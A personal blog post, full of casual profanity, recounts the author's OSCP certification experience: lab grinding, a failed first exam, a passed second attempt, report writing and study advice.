OSCP time baby!!! I wanted to do OSCP so much now I was always involved with some type of Cyber Security with these guys and everyone there knew I wanted to be an 3L337 H4X0R. So I started OSCP after one of my colleagues who already owns OSCP was always saying “Just fucking do it! fuck it! youll love it!” haha so I did.
In the beginning of August 2018 I registered for OSCP with 60 days of labs. An email comes through asking about current skill levels and knowledge; I answer truthfully and they say something along the lines of “Based on your current level we suggest you learn a bit more”. I said “fuck that, just sign me up!”.
I get my email confirmation after I paid and it stated that my course will begin the following Sunday. So now I began waiting and waiting and waiting….
Sunday comes along and on the dot the email comes in!!!
I download the Kali VM, connection pack and all the learning material. I had booked a week’s holiday in prep for this as well, so I was ready to start the learning and the pain to follow haha. I kissed my partner goodbye as she knew I would spend endless nights from now on in my office working hard.
I logged in and started ploughing through the material. I was learning how to start all these bind connections and reverse shell connections from server to computer and vice versa, learning bash scripting and creating shit with that, banner grabbing, BOF, enumeration skills and exploitation skills. This course is great! you learn so much in the beginning but Offensive Security have a clever way to only teach you enough about something that once you started using it in the labs you have to start your own research and googling around, you spend a lot of time googling for things as they only teach you the fundementals.
The Labs
I finished the material in a week! and made a start on the labs. It was a grind!!! Some boxes are simple, some are just fucking insane and frustrating! Some you just spend hours on and slap yourself once you get it and think “how the fuck did I not see that?!”.
Prepare for hours and hours and hours of work. I remember one box took me around 3 weeks on and off till I eventually got it! and it was worth it! The best advice I can give is don't give up and, as always, TryHarder. Fucking “try harder”, those 2 words were the most demoralizing words you hear in your head when you're stuck. If you ask someone for help and you're stuck at a point that's so fucking simple and you haven't worked it out yet, you'll hear “Try Harder!” haha. fuck you Try Harder! lol
The labs are so much fun. There are also different networks that you have to try and get into, but I won't tell you about them, you'll have to find your way to them yourself! I did get into one of them though.
I ended up at the end of the 60 days with under 20 boxes rooted, which compared to others was shit! However I did spend a lot more time on some boxes than others, which is all worth it in the end! I had also rooted 2 out of the 4 infamous boxes, Gh0st and Pain! There was so much time spent on those two, and trust me, if you're going to take them on they are extremely hard and you will learn a lot from them! I can't express how much of a pain in the arse they are to complete. There were times I was just like fuck you and this shit course!!!!
But I carried on and worked hard and learnt from my mistakes which is something you will do a lot of when you do the course and embark on this journey to become OSCP Certified.
Exam Attempt #1 (FAIL)
So it's the 14th of October and it was time to get into the exam. The email comes in exactly on the dot!!! I'm so impressed with the timing Offensive Security get these emails into their students' inboxes with.
Now I'll be honest, the best advice I was given for the exam was to expect to fail the first one! The exams test every single aspect of what you have learnt in the course. I went into this first exam expecting to fail but would still give it my everything!!
I connect in and start enumerating. I see a few boxes with a shitload of ports open on them all. I spent only an hour before I got my first low privilege shell, and then 2 hours later I got my second low privilege shell. I thought “oh shit yeah I'm fucking winning!”, I honestly thought I had it in the bag! I then spent the remaining 20 hours with 2 low privilege shells and not a single root!!! NOT 1 ROOT!!!! I was proper pissed off. I expected to fail but not that fucking hard!!! I thought I had worked so hard to have a good chance in the first exam but, nope!
I was pissed but oh well! I did get one thing out of it, I learnt all my weak areas!
I bought another 30 days lab extension, booked my exam for a couple of months later and got my head in the game. I rooted more boxes and was now at around 25 boxes rooted in the labs, learning something new from every new root. After my 30 days were up I spent some time on hackthebox.eu and VulnHub. I practiced, practiced and practiced some more, I worked harder than ever before! I……was…..determined!
Exam Attempt #2 (PASS)
It's the 3rd of February. I'm sat down at 11:00am, the PC is powered on, the VM is up and running and warmed up. I'm sitting staring at the inbox.
DING!! The email comes in at 11:45am and I open it up and start downloading the connection pack. I connect to the VPN and run the script that the proctoring guys want you to run to test everything is connected properly, and all was good. Now I'll be honest, I wasn't worried about the exam being proctored. The guys that do it are super cool and a good laugh; while I was waiting for their script to run (1 minute or so) one of them told me a joke which was quite funny, if you're reading this now thanks, it made me laugh. So, with the exam proctoring stuff connected and working (which also didn't really affect my CPU or RAM at all!), I was ready. So now they can see me on the webcam and see my screens, they're happy, we waited a few minutes and then when the clock struck 12pm I got the green light from them to start the exam!
Scans away! I set off some big fucking nmap scans that I knew would take a while but present me with some good information. While they were scanning I sat deep in my chair staring at my screen through squinted eyes developing the buffer overflow exploit. Within about an hour I had a working BOF exploit for the BOF box! I ran it and instantly got a reverse shell!
FUCK YEAH!!!
I documented everything. The nmap scans finished and I started looking through the results and then made a move on to the next box. I went for the next highest point box and after an hour got a reverse shell; another 6 hours passed and I rooted that box. That's now 2 roots on both the highest boxes in around 8 hours! Winning!
I carried on working on the remaining 3 boxes. After 2 hours I got a reverse shell on one box and then after a couple more hours I got a reverse shell on another box, both shells were Low Privilege shells! In 12 hours I had gained 2 roots on the 25 point boxes and 2 low priv shells on both 20 point boxes. I tried for hours to privilege escalate these windows boxes and got nowhere, and the 10 point one was so annoying and confusing I just told it to do one and gave up on it lol. I thought it would be more beneficial to put whatever time I had left into the two 20s and try to get somewhere.
Time went by so fast!! I went to bed at 4:30am and was up again at 8:00am trying to escalate these windows machines and to be honest, looking back, I now know I was trying wayyyyyy too hard and the most random shit that got me nowhere lol oh well. I made sure that for the boxes I did get, I had enough documentation for the report.
Before I knew it the time was 11:45 and the proctor person messaged me to say that the exam was over and to close all proctoring sessions down. So I closed everything down and saved my notes.
I can't explain how I felt after all that was done. I collapsed in my chair and just exhaled so hard, I really felt like I gave it my all and hoped that I had scraped enough points to pass. I was so tired!
Reporting
Reporting is reporting, I'm not sure what you guys want to know, but I'll tell you what most people ask, or what I have seen asked, about reporting. I used Microsoft Word on my windows machine to write the report. I followed the example report Offensive Security provide you with. I added loads of screenshots for each box, but not too many; be sure to read the guides on reporting they send you.
I would say it was around 7 hours later, after I had proofread it around 6 times and referenced the guide on how to ship Offensive Security the report, that it was off! Now the wait began. I sent my report at around 7pm that night and at around 10pm I received an email saying they had successfully received my exam report.
The next few days panned out like this….
Day 1 (Tuesday)
Day 2 (Wednesday)
Day 3 (Thursday)
Day 4 (Friday) came round and I woke up and got out of bed. Every day so far I had checked the notifications on my phone but nothing.
So it's 6am and I start getting ready for work thinking “Today is the day!”.
I have breakfast, cuppa tea, go jump in the shower and while I'm getting dressed it happens!!!!
**EMAIL NOTIFICATION!**
I unlock my phone, click on my email app and see this.
I instantly shit myself! I didn't know how well I did, after all I rooted both 25 point boxes and got low priv shells on the other two 20 point boxes. But hey, let's find out….
I clicked the email, it started loading!
Loaded!
OMG!
I finally did it! After so much hard work I finally passed the exam!
Below I'm going to leave some good links and things that I think anyone either wanting to start OSCP or start getting into Pentesting can benefit from.
Advice I would give my younger self:
Practice makes perfect and always be trying to learn something new.
Learn Python and Bash scripting languages.
Save your OSCP notes in 3 different places; for me it was one on the VM, one on my windows box and one in my Google Drive.
Learn your BASICS in everything, computers, networking, scripting language, programming language.
Most of all have FUN and TryHarder, if it was easy everyone would be doing it!